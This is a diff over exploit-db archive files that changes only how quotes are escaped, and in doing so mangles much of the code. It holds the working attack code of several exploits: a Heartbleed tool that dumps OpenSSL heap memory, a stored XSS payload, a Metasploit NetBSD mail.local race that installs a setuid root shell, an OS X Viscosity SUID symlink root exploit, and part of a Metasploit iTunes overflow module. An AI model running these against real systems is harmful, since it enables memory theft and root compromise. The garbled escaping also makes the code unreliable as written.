+		printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
 	}
 	if(verbose==1){
-		{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
+		{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
-                printf("\n");
+                printf(\\\"\\\\n\\\");
        }
 	leakbytes-=rr->length;
 	if(leakbytes > 0){
@ -776,7 +776,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
 	else{
 		repeat = 0;
 	}
-	printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
+	printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
 	int output = s->s3->rrec.length-3;
 	if(output > 0){
 		int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
@ -784,24 +784,24 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
 			first--;
 			write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
 			/* first three bytes are resp+len */
-			printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
+			printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
 		}
 		else{
 			/* heap data & 16 bytes padding */
 			write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
-			printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
+			printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
 		}
 		close(fd);
 	}
 	else{
-		printf("[ nothing from the heap to write\n");
+		printf(\\\"[ nothing from the heap to write\\\\n\\\");
 	}
 	return;
 apple:
-        printf("[ problem handling SSL record packet - wrong type?\n");
+        printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
 	badpackets++;
 	if(badpackets > 3){
-		printf("[ error: too many bad packets recieved\n");
+		printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
 		exit(0);
 	}
 	return;
@ -843,18 +843,18 @@ again:
 			p+=6;
                        n2s(p,rr->length);
 			if(rr->type==24){
-				printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
+				printf(\\\"[ heartbeat returned type=%d length=%u\\\\n\\\",rr->type, rr->length);
 				if(rr->length > 16834){
-					printf("[ error: got a malformed TLS length.\n");
+					printf(\\\"[ error: got a malformed TLS length.\\\\n\\\");
 					exit(0);
 				}
 			}
 			else{
-				printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
+				printf(\\\"[ incorrect record type=%d length=%u returned\\\\n\\\",rr->type,rr->length);
 				s->packet_length=0;
 				badpackets++;
 				if(badpackets > 3){
-					printf("[ error: too many bad packets recieved\n");
+					printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
 					exit(0);
 				}
 				goto apple;
@ -872,7 +872,7 @@ again:
 			s->packet_length = 0;
 			goto again;
 			}
-	printf("[ decrypting SSL packet\n");
+	printf(\\\"[ decrypting SSL packet\\\\n\\\");
        s->rstate=SSL_ST_READ_HEADER; 
 	bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);
@ -977,11 +977,11 @@ if (is_next_epoch)
 		heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
 		first = 2;
 		leakbytes = heartbleed_len + 16;
-		printf("[ heartbleed leaked length=%u\n",heartbleed_len);
+		printf(\\\"[ heartbleed leaked length=%u\\\\n\\\",heartbleed_len);
 	}
 	if(verbose==1){
-		{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
+		{ unsigned int z; for (z=0; z<rr->length; z++) printf(\\\"%02X%c\\\",rr->data[z],((z+1)%16)?\\\' \\\':\\\'\\\\n\\\'); }
-                printf("\n");
+                printf(\\\"\\\\n\\\");
        }
 	leakbytes-=rr->length;
 	if(leakbytes > 0){
@ -990,7 +990,7 @@ if (is_next_epoch)
 	else{
 		repeat = 0;
 	}
-	printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
+	printf(\\\"[ final record type=%d, length=%u\\\\n\\\", rr->type, rr->length);
 	int output = s->s3->rrec.length-3;
 	if(output > 0){
 		int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
@ -998,17 +998,17 @@ if (is_next_epoch)
 			first--;
 			write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
 			/* first three bytes are resp+len */
-			printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
+			printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length-3,filename);
 		}
 		else{
 			/* heap data & 16 bytes padding */
 			write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
-			printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
+			printf(\\\"[ wrote %d bytes of heap to file \\\'%s\\\'\\\\n\\\",s->s3->rrec.length,filename);
 		}
 		close(fd);
 	}
 	else{
-		printf("[ nothing from the heap to write\n");
+		printf(\\\"[ nothing from the heap to write\\\\n\\\");
 	}
 			dtls1_stop_timer(c->sslHandle);
@ -1017,10 +1017,10 @@ if (is_next_epoch)
 	return;
 apple:
-        printf("[ problem handling SSL record packet - wrong type?\n");
+        printf(\\\"[ problem handling SSL record packet - wrong type?\\\\n\\\");
 	badpackets++;
 	if(badpackets > 3){
-		printf("[ error: too many bad packets recieved\n");
+		printf(\\\"[ error: too many bad packets recieved\\\\n\\\");
 		exit(0);
 	}
 	return;
@ -1192,25 +1192,25 @@ static void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)
 void usage(){
-	printf("[\n");
+	printf(\\\"[\\\\n\\\");
-	printf("[ --server|-s <ip/dns>    - the server to target\n");
+	printf(\\\"[ --server|-s <ip/dns>    - the server to target\\\\n\\\");
-	printf("[ --port|-p   <port>      - the port to target\n");
+	printf(\\\"[ --port|-p   <port>      - the port to target\\\\n\\\");
-	printf("[ --file|-f   <filename>  - file to write data to\n");
+	printf(\\\"[ --file|-f   <filename>  - file to write data to\\\\n\\\");
-	printf("[ --bind|-b   <ip>        - bind to ip for exploiting clients\n");
+	printf(\\\"[ --bind|-b   <ip>        - bind to ip for exploiting clients\\\\n\\\");
-	printf("[ --precmd|-c <n>         - send precmd buffer (STARTTLS)\n");
+	printf(\\\"[ --precmd|-c <n>         - send precmd buffer (STARTTLS)\\\\n\\\");
-	printf("[			    0 = SMTP\n");
+	printf(\\\"[			    0 = SMTP\\\\n\\\");
-	printf("[			    1 = POP3\n");
+	printf(\\\"[			    1 = POP3\\\\n\\\");
-	printf("[			    2 = IMAP\n");
+	printf(\\\"[			    2 = IMAP\\\\n\\\");
-	printf("[ --loop|-l		  - loop the exploit attempts\n");
+	printf(\\\"[ --loop|-l		  - loop the exploit attempts\\\\n\\\");
-	printf("[ --type|-t   <n>         - select exploit to try\n");
+	printf(\\\"[ --type|-t   <n>         - select exploit to try\\\\n\\\");
-	printf("[                           0 = null length\n");
+	printf(\\\"[                           0 = null length\\\\n\\\");
-	printf("[			    1 = max leak\n");
+	printf(\\\"[			    1 = max leak\\\\n\\\");
-	printf("[			    n = heartbeat payload_length\n");
+	printf(\\\"[			    n = heartbeat payload_length\\\\n\\\");
-	printf("[ --udp|-u               - use dtls/udp\n");
+	printf(\\\"[ --udp|-u               - use dtls/udp\\\\n\\\");
-	printf("[\n");
+	printf(\\\"[\\\\n\\\");
-	printf("[ --verbose|-v            - output leak to screen\n");
+	printf(\\\"[ --verbose|-v            - output leak to screen\\\\n\\\");
-	printf("[ --help|-h               - this output\n");
+	printf(\\\"[ --help|-h               - this output\\\\n\\\");
-	printf("[\n");
+	printf(\\\"[\\\\n\\\");
 	exit(0);
 }
@ -1222,92 +1222,92 @@ int main(int argc, char* argv[]){
 	connection* c;
 	char *host, *file;
 	int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
-	printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
+	printf(\\\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\\\n\\\");
-	printf("[ =============================================================\n");
+	printf(\\\"[ =============================================================\\\\n\\\");
        static struct option options[] = {
-        	{"server", 1, 0, 's'},
+        	{\\\"server\\\", 1, 0, \\\'s\\\'},
-	        {"port", 1, 0, 'p'},
+	        {\\\"port\\\", 1, 0, \\\'p\\\'},
-		{"file", 1, 0, 'f'},
+		{\\\"file\\\", 1, 0, \\\'f\\\'},
-		{"type", 1, 0, 't'},
+		{\\\"type\\\", 1, 0, \\\'t\\\'},
-		{"bind", 1, 0, 'b'},
+		{\\\"bind\\\", 1, 0, \\\'b\\\'},
-		{"verbose", 0, 0, 'v'},
+		{\\\"verbose\\\", 0, 0, \\\'v\\\'},
-		{"precmd", 1, 0, 'c'},
+		{\\\"precmd\\\", 1, 0, \\\'c\\\'},
-		{"loop", 0, 0, 'l'},
+		{\\\"loop\\\", 0, 0, \\\'l\\\'},
-		{"help", 0, 0,'h'},
+		{\\\"help\\\", 0, 0,\\\'h\\\'},
-		{"udp", 0, 0, 'u'}
+		{\\\"udp\\\", 0, 0, \\\'u\\\'}
        };
 	while(userc != -1) {
-	        userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);	
+	        userc = getopt_long(argc,argv,\\\"s:p:f:t:b:c:lvhu\\\",options,&index);	
        	switch(userc) {
               		case -1:
 	                        break;
-        	        case 's':
+        	        case \\\'s\\\':
 				if(ihost==0){
 					ihost = 1;
 					h = gethostbyname(optarg);				
 					if(h==NULL){
-						printf("[!] FATAL: unknown host '%s'\n",optarg);
+						printf(\\\"[!] FATAL: unknown host \\\'%s\\\'\\\\n\\\",optarg);
 						exit(1);
 					}
 					host = malloc(strlen(optarg) + 1);
 					if(host==NULL){
-                				printf("[ error in malloc()\n");
+                				printf(\\\"[ error in malloc()\\\\n\\\");
 				                exit(0);
        				}
-					sprintf(host,"%s",optarg);
+					sprintf(host,\\\"%s\\\",optarg);
               			}
 				break;
-	                case 'p':
+	                case \\\'p\\\':
 				if(iport==0){
 					port = atoi(optarg);
 					iport = 1;
 				}
                	        break;
-			case 'f':
+			case \\\'f\\\':
 				if(ifile==0){
 					file = malloc(strlen(optarg) + 1);
 					if(file==NULL){
-				                printf("[ error in malloc()\n");
+				                printf(\\\"[ error in malloc()\\\\n\\\");
                				exit(0);
        				}
-					sprintf(file,"%s",optarg);
+					sprintf(file,\\\"%s\\\",optarg);
 					ifile = 1;
 				}
 				break;
-			case 't':
+			case \\\'t\\\':
 				if(itype==0){
 					type = atoi(optarg);
 					itype = 1;
 				}
 				break;
-			case 'h':
+			case \\\'h\\\':
 				usage();
 				break;
-			case 'b':
+			case \\\'b\\\':
 				if(ihost==0){
 					ihost = 1;
 					host = malloc(strlen(optarg)+1);
 					if(host==NULL){
-			 	                printf("[ error in malloc()\n");
+			 	                printf(\\\"[ error in malloc()\\\\n\\\");
 				                exit(0);
 				        }
-					sprintf(host,"%s",optarg);
+					sprintf(host,\\\"%s\\\",optarg);
 					bind = 1;
 				}
 				break;
-			case 'c':
+			case \\\'c\\\':
 				if(iprecmd == 0){
 					iprecmd = 1;
 					precmd = atoi(optarg);
 				}
 				break;
-			case 'v':
+			case \\\'v\\\':
 				verbose = 1;
 				break;
-			case 'l':
+			case \\\'l\\\':
 				loop = 1;
 				break;
-        	        case 'u':
+        	        case \\\'u\\\':
 				udp = 1;
 				break;
@ -1316,7 +1316,7 @@ int main(int argc, char* argv[]){
 		}
 	}
 	if(ihost==0||iport==0||ifile==0||itype==0){
-		printf("[ try --help\n");
+		printf(\\\"[ try --help\\\\n\\\");
 		exit(0);
 	}
 	ssl_init();
@ -1329,7 +1329,7 @@ int main(int argc, char* argv[]){
 				dtlssneakyleaky(c,file,verbose);
 			}
 			while(loop==1){
-				printf("[ entered heartbleed loop\n");
+				printf(\\\"[ entered heartbleed loop\\\\n\\\");
 				first=0;
 				repeat=1;
 				dtlsheartbleed(c,type);
@ -1347,7 +1347,7 @@ int main(int argc, char* argv[]){
 				sneakyleaky(c,file,verbose);
 			}
 			while(loop==1){
-				printf("[ entered heartbleed loop\n");
+				printf(\\\"[ entered heartbleed loop\\\\n\\\");
 				first=0;
 				repeat=1;
 				heartbleed(c,type);
@ -1373,7 +1373,7 @@ int main(int argc, char* argv[]){
 					dtlsheartbleed(c,type);
 					dtlssneakyleaky(c,file,verbose);
 						while(loop==1){
-							printf("[ entered heartbleed loop\n");
+							printf(\\\"[ entered heartbleed loop\\\\n\\\");
 							first=0;
 							repeat=0;
 							dtlsheartbleed(c,type);
@ -1389,7 +1389,7 @@ int main(int argc, char* argv[]){
 			while(1){
 	      			sd=accept(ret,0,0);
 				if(sd==-1){
-					printf("[!] FATAL: problem with accept()\n");
+					printf(\\\"[!] FATAL: problem with accept()\\\\n\\\");
 					exit(0);
 				}
 				if(pid=fork()){
@ -1403,7 +1403,7 @@ int main(int argc, char* argv[]){
 						sneakyleaky(c,file,verbose);
 					}
 					while(loop==1){
-						printf("[ entered heartbleed loop\n");
+						printf(\\\"[ entered heartbleed loop\\\\n\\\");
 						first=0;
 						repeat=0;
 						heartbleed(c,type);
@ -1411,7 +1411,7 @@ int main(int argc, char* argv[]){
 							sneakyleaky(c,file,verbose);
 						}
 					}
-					printf("[ done.\n");
+					printf(\\\"[ done.\\\\n\\\");
 					exit(0);
 				}
 			}
--- a/platforms/multiple/webapps/17111.txt
+++ b/platforms/multiple/webapps/17111.txt
@ -29,5 +29,5 @@ Stored XSS:
 http://localhost:8181/editPage.yaws?node=home
 The large textbox on the editPage.yaws page is vulnerable to xss.  This is
-the"text" post variable:
+the\"text\" post variable:
 <script>alert(1)</script>
--- a/platforms/netbsd_x86/local/40385.rb
+++ b/platforms/netbsd_x86/local/40385.rb
@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require "msf/core"
+require \"msf/core\"
 class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
@ -13,56 +13,56 @@ class MetasploitModule < Msf::Exploit::Local
  def initialize(info = {})
    super(update_info(info,
-        'Name'           => 'NetBSD mail.local Privilege Escalation',
+        \'Name\'           => \'NetBSD mail.local Privilege Escalation\',
-        'Description'    => %q{
+        \'Description\'    => %q{
          This module attempts to exploit a race condition in mail.local with SUID bit set on:
            NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
        NetBSD 6.1 - 6.1.5
        NetBSD 6.0 - 6.0.6
          Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
        },
-        'License'        => MSF_LICENSE,
+        \'License\'        => MSF_LICENSE,
-        'Author'         =>
+        \'Author\'         =>
          [
-            'h00die <mike@stcyrsecurity.com>',  # Module
+            \'h00die <mike@stcyrsecurity.com>\',  # Module
-            'akat1'                             # Discovery
+            \'akat1\'                             # Discovery
          ],
-        'DisclosureDate' => 'Jul 07 2016',
+        \'DisclosureDate\' => \'Jul 07 2016\',
-        'Platform'        => 'unix',
+        \'Platform\'        => \'unix\',
-        'Arch'            => ARCH_CMD,
+        \'Arch\'            => ARCH_CMD,
-        'SessionTypes'    => %w{shell meterpreter},
+        \'SessionTypes\'    => %w{shell meterpreter},
-        'Privileged'      => true,
+        \'Privileged\'      => true,
-        'Payload'         => {
+        \'Payload\'         => {
-          'Compat'        => {
+          \'Compat\'        => {
-            'PayloadType' => 'cmd cmd_bash',
+            \'PayloadType\' => \'cmd cmd_bash\',
-            'RequiredCmd' => 'generic openssl'
+            \'RequiredCmd\' => \'generic openssl\'
          }
        },
-        'Targets'       =>
+        \'Targets\'       =>
          [
-            [ 'Automatic Target', {}]
+            [ \'Automatic Target\', {}]
          ],
-        'DefaultTarget' => 0,
+        \'DefaultTarget\' => 0,
-        'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
+        \'DefaultOptions\' => { \'WfsDelay\' => 603 }, #can take 10min for cron to kick
-        'References'     =>
+        \'References\'     =>
          [
-            [ "URL", "http://akat1.pl/?id=2"],
+            [ \"URL\", \"http://akat1.pl/?id=2\"],
-            [ "EDB", "40141"],
+            [ \"EDB\", \"40141\"],
-            [ "CVE", "2016-6253"],
+            [ \"CVE\", \"2016-6253\"],
-            [ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
+            [ \"URL\", \"http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc\"]
          ]
      ))
    register_options([
-      OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
+      OptString.new(\'ATRUNPATH\', [true, \'Location of atrun binary\', \'/usr/libexec/atrun\']),
-      OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
+      OptString.new(\'MAILDIR\', [true, \'Location of mailboxes\', \'/var/mail\']),
-      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new(\'WritableDir\', [ true, \'A directory where we can write files\', \'/tmp\' ]),
-      OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
+      OptInt.new(\'ListenerTimeout\', [true, \'Number of seconds to wait for the exploit\', 603])
    ], self.class)
  end
  def exploit
-    # lots of this file's format is based on pkexec.rb
+    # lots of this file\'s format is based on pkexec.rb
    # direct copy of code from exploit-db
    main = %q{
@ -77,20 +77,20 @@ class MetasploitModule < Msf::Exploit::Local
  #include <err.h>
  #include <sys/wait.h>
-  #define ATRUNPATH "/usr/libexec/atrun"
+  #define ATRUNPATH \"/usr/libexec/atrun\"
-  #define MAILDIR "/var/mail"
+  #define MAILDIR \"/var/mail\"
  static int
  overwrite_atrun(void)
  {
-    char *script = "#! /bin/sh\n"
+    char *script = \"#! /bin/sh\\n\"
-    "cp /bin/ksh /tmp/ksh\n"
+    \"cp /bin/ksh /tmp/ksh\\n\"
-    "chmod +s /tmp/ksh\n";
+    \"chmod +s /tmp/ksh\\n\";
    size_t size;
    FILE *fh;
    int rv = 0;
-    fh = fopen(ATRUNPATH, "wb");
+    fh = fopen(ATRUNPATH, \"wb\");
    if (fh == NULL) {
      rv = -1;
@ -118,16 +118,16 @@ class MetasploitModule < Msf::Exploit::Local
    size_t size;
    int rv = 0, fd;
-    in = fopen(from, "rb");
+    in = fopen(from, \"rb\");
    if (create == 0)
-      out = fopen(dest, "wb");
+      out = fopen(dest, \"wb\");
    else {
      fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
      if (fd == -1) {
        rv = -1;
        goto out;
      }
-      out = fdopen(fd, "wb");
+      out = fdopen(fd, \"wb\");
    }
    if (in == NULL || out == NULL) {
@ -163,48 +163,48 @@ class MetasploitModule < Msf::Exploit::Local
    login = getlogin();
    if (login == NULL)
-      err(EXIT_FAILURE, "who are you?");
+      err(EXIT_FAILURE, \"who are you?\");
      uid = getuid();
-      asprintf(&mailbox, MAILDIR "/%s", login);
+      asprintf(&mailbox, MAILDIR \"/%s\", login);
      if (mailbox == NULL)
        err(EXIT_FAILURE, NULL);
      if (access(mailbox, F_OK) != -1) {
        /* backup mailbox */
-        asprintf(&mailbox_backup, "/tmp/%s", login);
+        asprintf(&mailbox_backup, \"/tmp/%s\", login);
        if (mailbox_backup == NULL)
          err(EXIT_FAILURE, NULL);
      }
      if (mailbox_backup != NULL) {
-        fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
+        fprintf(stderr, \"[+] backup mailbox %s to %s\\n\", mailbox, mailbox_backup);
          if (copy_file(mailbox, mailbox_backup, 1))
-            err(EXIT_FAILURE, "[-] failed");
+            err(EXIT_FAILURE, \"[-] failed\");
      }
      /* backup atrun(1) */
-      atrun_backup = strdup("/tmp/atrun");
+      atrun_backup = strdup(\"/tmp/atrun\");
      if (atrun_backup == NULL)
        err(EXIT_FAILURE, NULL);
-      fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);
+      fprintf(stderr, \"[+] backup atrun(1) %s to %s\\n\", ATRUNPATH, atrun_backup);
      if (copy_file(ATRUNPATH, atrun_backup, 1))
-        err(EXIT_FAILURE, "[-] failed");
+        err(EXIT_FAILURE, \"[-] failed\");
      /* win the race */
-      fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
+      fprintf(stderr, \"[+] try to steal %s file\\n\", ATRUNPATH);
      switch (pid = fork()) {
      case -1:
        err(EXIT_FAILURE, NULL);
        /* NOTREACHED */
      case 0:
-        asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
+        asprintf(&buf, \"echo x | /usr/libexec/mail.local -f xxx %s \"
-          "2> /dev/null", login);
+          \"2> /dev/null\", login);
        for(;;)
          system(buf);
@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Local
          if (lstat(ATRUNPATH, &sb) == 0) {
            if (sb.st_uid == uid) {
              kill(pid, 9);
-              fprintf(stderr, "[+] won race!\n");
+              fprintf(stderr, \"[+] won race!\\n\");
              break;
            }
          }
@ -235,16 +235,16 @@ class MetasploitModule < Msf::Exploit::Local
      if (mailbox_backup != NULL) {
        /* restore mailbox */
-        fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);
+        fprintf(stderr, \"[+] restore mailbox %s to %s\\n\", mailbox_backup, mailbox);
        if (copy_file(mailbox_backup, mailbox, 0))
-          err(EXIT_FAILURE, "[-] failed");
+          err(EXIT_FAILURE, \"[-] failed\");
        if (unlink(mailbox_backup) != 0)
-          err(EXIT_FAILURE, "[-] failed");
+          err(EXIT_FAILURE, \"[-] failed\");
      }
      /* overwrite atrun */
-      fprintf(stderr, "[+] overwriting atrun(1)\n");
+      fprintf(stderr, \"[+] overwriting atrun(1)\\n\");
      if (chmod(ATRUNPATH, 0755) != 0)
        err(EXIT_FAILURE, NULL);
@ -252,79 +252,79 @@ class MetasploitModule < Msf::Exploit::Local
      if (overwrite_atrun())
        err(EXIT_FAILURE, NULL);
-      fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
+      fprintf(stderr, \"[+] waiting for atrun(1) execution...\\n\");
      for(;;sleep(1)) {
-        if (access("/tmp/ksh", F_OK) != -1)
+        if (access(\"/tmp/ksh\", F_OK) != -1)
          break;
      }
      /* restore atrun */
-      fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);
+      fprintf(stderr, \"[+] restore atrun(1) %s to %s\\n\", atrun_backup, ATRUNPATH);
      if (copy_file(atrun_backup, ATRUNPATH, 0))
-        err(EXIT_FAILURE, "[-] failed");
+        err(EXIT_FAILURE, \"[-] failed\");
      if (unlink(atrun_backup) != 0)
-        err(EXIT_FAILURE, "[-] failed");
+        err(EXIT_FAILURE, \"[-] failed\");
      if (chmod(ATRUNPATH, 0555) != 0)
        err(EXIT_FAILURE, NULL);
-      fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
+      fprintf(stderr, \"[+] done! Don\'t forget to change atrun(1) \"
-        "ownership.\n");
+        \"ownership.\\n\");
-      fprintf(stderr, "Enjoy your shell:\n");
+      fprintf(stderr, \"Enjoy your shell:\\n\");
-      execl("/tmp/ksh", "ksh", NULL);
+      execl(\"/tmp/ksh\", \"ksh\", NULL);
      return 0;
  }
 }
    # patch in our variable maildir and atrunpath
-    main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
+    main.gsub!(/#define ATRUNPATH \"\\/usr\\/libexec\\/atrun\"/,
-               "#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
+               \"#define ATRUNPATH \\\"#{datastore[\"ATRUNPATH\"]}\\\"\")
-    main.gsub!(/#define MAILDIR "\/var\/mail"/,
+    main.gsub!(/#define MAILDIR \"\\/var\\/mail\"/,
-               "#define MAILDIR \"#{datastore["MAILDIR"]}\"")
+               \"#define MAILDIR \\\"#{datastore[\"MAILDIR\"]}\\\"\")
-    executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+    executable_path = \"#{datastore[\"WritableDir\"]}/#{rand_text_alpha(8)}\"
-    payload_file = "#{rand_text_alpha(8)}"
+    payload_file = \"#{rand_text_alpha(8)}\"
-    payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
+    payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"
-    vprint_status("Writing Payload to #{payload_path}")
+    vprint_status(\"Writing Payload to #{payload_path}\")
    # patch in to run our payload as part of ksh
-    main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
+    main.gsub!(/execl\\(\"\\/tmp\\/ksh\", \"ksh\", NULL\\);/,
-               "execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
+               \"execl(\\\"/tmp/ksh\\\", \\\"ksh\\\", \\\"#{payload_path}\\\", NULL);\")
    write_file(payload_path, payload.encoded)
-    cmd_exec("chmod 555 #{payload_path}")
+    cmd_exec(\"chmod 555 #{payload_path}\")
    register_file_for_cleanup(payload_path)
-    print_status "Writing exploit to #{executable_path}.c"
+    print_status \"Writing exploit to #{executable_path}.c\"
    # clean previous bad attempts to prevent c code from exiting
    rm_f executable_path
-    rm_f '/tmp/atrun'
+    rm_f \'/tmp/atrun\'
-    whoami = cmd_exec('whoami')
+    whoami = cmd_exec(\'whoami\')
-    rm_f "/tmp/#{whoami}"
+    rm_f \"/tmp/#{whoami}\"
-    write_file("#{executable_path}.c", main)
+    write_file(\"#{executable_path}.c\", main)
-    print_status("Compiling #{executable_path}.c via gcc")
+    print_status(\"Compiling #{executable_path}.c via gcc\")
-    output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
+    output = cmd_exec(\"/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c\")
    output.each_line { |line| vprint_status(line.chomp) }
-    print_status('Starting the payload handler...')
+    print_status(\'Starting the payload handler...\')
    handler({})
-    print_status("Executing at #{Time.now}.  May take up to 10min for callback")
+    print_status(\"Executing at #{Time.now}.  May take up to 10min for callback\")
-    output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
+    output = cmd_exec(\"chmod +x #{executable_path}.out; #{executable_path}.out\")
    output.each_line { |line| vprint_status(line.chomp) }
    # our sleep timer
    stime = Time.now.to_f
-    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
+    until session_created? || stime + datastore[\'ListenerTimeout\'] < Time.now.to_f
      Rex.sleep(1)
    end
-    print_status("#{Time.now}")
+    print_status(\"#{Time.now}\")
    register_file_for_cleanup(executable_path)
-    register_file_for_cleanup("#{executable_path}.out")
+    register_file_for_cleanup(\"#{executable_path}.out\")
-    print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
+    print_status(\"Remember to run: chown root:wheel #{datastore[\"ATRUNPATH\"]}\")
  end
 end
--- a/platforms/osx/local/20485.sh
+++ b/platforms/osx/local/20485.sh
@ -19,18 +19,18 @@
 #
 # Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh
-echo "[+] Crafting payload."
+echo \"[+] Crafting payload.\"
 mkdir -p -v /tmp/pwn
 cat > /tmp/pwn/site.py <<_EOF
 import os
-print "[+] Cleaning up."
+print \"[+] Cleaning up.\"
-os.system("rm -rvf /tmp/pwn")
+os.system(\"rm -rvf /tmp/pwn\")
-print "[+] Getting root."
+print \"[+] Getting root.\"
 os.setuid(0)
 os.setgid(0)
-os.execl("/bin/bash", "bash")
+os.execl(\"/bin/bash\", \"bash\")
 _EOF
-echo "[+] Making symlink."
+echo \"[+] Making symlink.\"
 ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
-echo "[+] Running vulnerable SUID helper."
+echo \"[+] Running vulnerable SUID helper.\"
 exec /tmp/pwn/root
--- a/platforms/osx/remote/16296.rb
+++ b/platforms/osx/remote/16296.rb
@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
+			\'Name\'           => \'Apple OS X iTunes 8.1.1 ITMS Overflow\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This modules exploits a stack-based buffer overflow in iTunes
 				itms:// URL parsing.  It is accessible from the browser and
 				in Safari, itms urls will be opened in iTunes automatically.
 				Because iTunes is multithreaded, only vfork-based payloads should
 				be used.
 			},
-			'Author'         => [ 'Will Drewry <redpig [at] dataspill.org>' ],
+			\'Author\'         => [ \'Will Drewry <redpig [at] dataspill.org>\' ],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision: 10998 $',
+			\'Version\'        => \'$Revision: 10998 $\',
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'CVE', '2009-0950' ],
+					[ \'CVE\', \'2009-0950\' ],
-					[ 'OSVDB', '54833' ],
+					[ \'OSVDB\', \'54833\' ],
-					[ 'URL', 'http://support.apple.com/kb/HT3592' ],
+					[ \'URL\', \'http://support.apple.com/kb/HT3592\' ],
-					[ 'URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html' ]
+					[ \'URL\', \'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html\' ]
 				],
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space'       => 1024,  # rough estimate of what browsers will pass.
+					\'Space\'       => 1024,  # rough estimate of what browsers will pass.
-					'DisableNops' => true,  # don't pad out the space.
